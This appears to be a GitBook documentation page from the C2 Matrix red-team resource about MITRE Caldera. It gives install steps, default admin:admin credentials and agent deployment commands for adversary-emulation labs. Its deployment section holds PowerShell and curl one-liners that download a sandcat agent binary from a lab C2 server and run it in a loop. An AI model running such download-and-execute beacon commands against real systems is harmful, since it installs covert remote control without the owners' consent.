C2 Matrix
C2 Matrix
C2 Matrix
C2 Matrix
The C2 Matrix
SANS Slingshot C2 Matrix Edition
Contribute
Lab Infrastructure
C2 Matrix Eval Lab
Basic Lab
Virtual Machines with C2s
Docker
Resources
C2
Caldera
Covenant
Empire
Faction
ibombshell
Koadic
Merlin
Mythic
Nuages
PoshC2
PowerHub
SilentTrinity
Sliver
SCYTHE
TrevorC2
Attack Infrastructure
Resources
Redirectors
Detection
Basics
Beacons
JA3/JA3S Hashes
JARM
Powered by GitBook

Caldera

Install Caldera

Ensure Docker is installed first. Run as root

cd /opt
sudo git clone https://github.com/mitre/caldera.git --recursive
cd caldera
sudo ./install.sh --kali

Run Caldera

cd /opt/caldera
source calderaenv/bin/activate
python server.py
http://127.0.0.1:8888
admin:admin

Deploy Agent

Windows

$url="http://192.168.120.135:8888/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output); C:\Users\Public\sandcat.exe -server http://192.168.120.135:8888 -group my_group;
OR
while($true) {$url="http://192.168.120.135:443/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("file","sandcat.exe");$output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output);C:\Users\Public\sandcat.exe http://192.168.120.135:443 my_group; sleep 60}

Linux

while true; do curl -sk -X POST -H 'file:sandcat-linux' http://localhost:8888/file/download > /tmp/sandcat-linux && chmod +x /tmp/sandcat-linux && /tmp/sandcat-linux http://localhost:8888 my_group; sleep 60; done

Understanding Caldera

This graphic created by Adam Mashinchi

Presentation from Erik van Buggenhout: https://www.slideshare.net/erikvanbuggenhout/adversary-emulation-using-caldera

Caldera YouTube Playlist: https://www.youtube.com/playlist?list=PLkTApXQou_8KFTzR7KqDJh-ndMO39PYnB

Lab Infrastructure - Previous
Resources
Next - C2
Covenant
Last updated 10 months ago
Contents
Install Caldera
Run Caldera
Deploy Agent
Understanding Caldera